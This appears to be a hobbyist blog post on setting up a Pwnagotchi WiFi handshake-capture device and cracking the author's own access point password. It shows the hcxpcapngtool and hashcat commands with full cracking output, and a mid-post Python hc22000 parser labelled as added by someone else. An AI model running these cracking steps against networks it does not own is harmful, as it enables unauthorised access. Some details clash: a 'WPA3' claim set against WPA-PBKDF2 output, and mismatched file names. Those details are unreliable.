
Pwnagotchi – AI-powered WiFi hacking!

Bill Jones
May 10, 2024
5 min read

It’s not known by many, but this powerful toolchain showcases the forward momentum AI has in store for the future of cybersecurity. I discovered this tool through a random video on YouTube Shorts and with a quick 10-second video of “Look at this hacking tool that PWNZ wireless networks,” I had to dive in. Over the next hour or so, I had to use Google to find more information, as there were zero links in the video I watched. Quickly, I noticed there seemed to be a split in an unknown community as there were various images and instructional guides, including many!

Let's AI

The project's documentation is at https://pwnagotchi.ai/, which appears to be the official page. Do note, you visit at your own risk. Within the documentation, a nugget discusses the neural network, which allows the AI to “eat handshakes.” The AI used within the pwnagotchi claims to be a reinforcement learning style AI, meaning it learns by failing in a very repetitive fashion, much like me when I’m coding hobby projects. Amazon provides some useful reading about reinforcement learning. Reading is what I did so I could better understand the various states the claimed AI was taking to “eat handshakes.”

The process was relatively straightforward, and I found various fixes since I decided to order the latest version of hardware components and not follow the “recommended hardware” section. Who has time to read recommendations these days? So, the following pain was because I deviated, and v1.5.5, as listed, didn’t work out of the box. I had to find other resources by searching GitHub for other forked repositories that had made promises to get the WaveShare v4.0 operational, the paperwhite display that drives the information to the end user meaningfully.

After about an hour, I had everything configured and operational, including a tea break and some more YouTube video binging. The face greeted me on the screen with a message: “I’m mad at you.” Short of dunking it into my tea because how dare this AI speak to me this way? I laughed delightedly and decided to dive into the configuration and look under the hood. You can have a direct look by going directly to this portion of the website: https://pwnagotchi.ai/usage/#training-the-ai.

Outcome

My wireless AP only took less than 10 seconds to show up as PWND! I connected via SSH to the PiZero and extracted the pcap file. I converted this to the required hc22000 format, which hashcat needs to perform the final step of cracking the hash. Because I don’t need to run a list of thousands of passwords to test, I put my AP password into a file called word.txt to illustrate how effective the handshake eating was from the Pwnagotchi! I’ve used many other tools, including the WiFi Pineapple from Hak5, but this tool ran for $80.56 and only took less than an hour to set up and begin using.

FOR LEARNING PURPOSES ONLY

hcxpcapngtool -o AP.hc2200 AP.pcap
hashcat --force -m 22000 AP.hc2200 word.txt

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: SGC.hc2200
Time.Started.....: Wed Apr 24 16:15:45 2024, (0 secs)
Time.Estimated...: Wed Apr 24 16:15:45 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (word.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      15 H/s (0.56ms) @ Accel:64 Loops:64 Thr:64 Vec:1
Recovered........: 2/2 (100.00%) Digests (total), 2/2(100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1-3
Candidate.Engine.: Device Generator
Candidates.#1....: notmywifi -> notmywifi
Hardware.Mon.SMC.: Fan0: 99%, Fan1: 99%
Hardware.Mon.#1..: Util: 92%

Started: Wed Apr 24 16:15:44 2024
Stopped: Wed Apr 24 16:15:46 2024

As you can see from the above output, the pwnagotchi successfully ate the handshakes required to capture enough data to determine what would be needed to obtain the passphrase to the WPA3-secured wireless network.
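To see what the converted file actually holds when auditing your own capture, here is an added example (not from the original post, hcxtools or hashcat) that parses hc22000 lines following hashcat's documented mode 22000 field layout and lists which networks have a record in the file. The sample lines, the "HomeLab" ESSID and the function names are constructed for illustration.

```python
from dataclasses import dataclass

# hashcat mode 22000 line, '*'-separated:
# WPA*TYPE*PMKID_or_MIC*MAC_AP*MAC_CLIENT*ESSID(hex)*ANONCE*EAPOL*MESSAGEPAIR
TYPES = {"01": "PMKID", "02": "EAPOL"}

# Constructed sample lines (placeholder hex values, not a real capture).
_ESSID = b"HomeLab".hex()
SAMPLE = [
    f"WPA*01*{'aa' * 16}*020000000001*020000000002*{_ESSID}***",
    f"WPA*02*{'bb' * 16}*020000000001*020000000002*{_ESSID}"
    f"*{'cc' * 32}*{'dd' * 20}*02",
]

@dataclass
class Record:
    kind: str         # "PMKID" or "EAPOL"
    ap_mac: str
    client_mac: str
    essid: str

def _mac(field: str) -> str:
    if len(field) != 12:
        raise ValueError(f"bad MAC field: {field!r}")
    bytes.fromhex(field)  # raises ValueError if not hex
    return ":".join(field[i:i + 2] for i in range(0, 12, 2)).lower()

def parse_line(line: str) -> Record:
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] not in TYPES:
        raise ValueError("not an hc22000 record")
    if len(f[2]) != 32:
        raise ValueError("PMKID/MIC must be 16 bytes of hex")
    bytes.fromhex(f[2])
    kind = TYPES[f[1]]
    if kind == "EAPOL" and not (f[6] and f[7]):
        raise ValueError("EAPOL record needs ANONCE and EAPOL fields")
    essid = bytes.fromhex(f[5]).decode("utf-8", errors="replace")
    return Record(kind, _mac(f[3]), _mac(f[4]), essid)

def exposed_networks(lines):
    """Map each ESSID to the record kinds captured for it; skip junk lines."""
    found = {}
    for line in lines:
        try:
            rec = parse_line(line)
        except ValueError:
            continue  # blank or malformed line
        found.setdefault(rec.essid, set()).add(rec.kind)
    return found
```

Any ESSID this reports has a record that hashcat can test passphrase guesses against offline, so that network's protection rests entirely on the strength of its passphrase.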

Future

Within this adventure, the possibilities are endless for crafting precise tools to perform attacks and do it well. While the primary focus is on Large Language Models (LLMs), threat actors aren’t just sitting idle or hacking prompts to divulge sensitive data; they’re actively working on projects much like the pwnagotchi. As for now, the game of cat and mouse that we call cybersecurity rages on for the long-term foreseeable future.
